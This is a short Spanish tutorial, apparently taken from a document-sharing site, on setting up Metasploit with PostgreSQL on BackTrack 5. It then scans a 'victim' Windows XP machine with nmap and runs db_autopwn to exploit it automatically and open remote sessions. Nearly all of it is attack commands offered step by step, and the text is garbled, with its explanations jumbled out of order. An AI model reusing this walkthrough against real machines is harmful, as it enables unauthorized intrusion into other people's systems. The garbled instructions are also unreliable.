Documentos de Académico
Documentos de Profesional
Documentos de Cultura
dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL
El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:
Aqu pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ;
despus
\q
gem install pg
msfconsole
db_driver postgresql
y para conectar con la base de datos
db_connect postgres:password@127.0.0.1/metasploitdb
El password que habas puesto anterior mente. Aqu va el nombre que le quiera asignar a la base de datos.
Ahora utilizamos nmap para ver las vulnerabilidades de la vctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la vctima que para el tutorial es una maquina virtual de xp sp 1.
Nmap escaneo los puertos e identifico el sistema operativo de la vctima. Ahora procedemos con el ataque.
db_hosts db_autopwn -t -p -e
AL terminar el autopwn muestra las posibles sesiones.
Para entrar a una de ellas sessions -i 1 el numero es la sesin que fue elegida.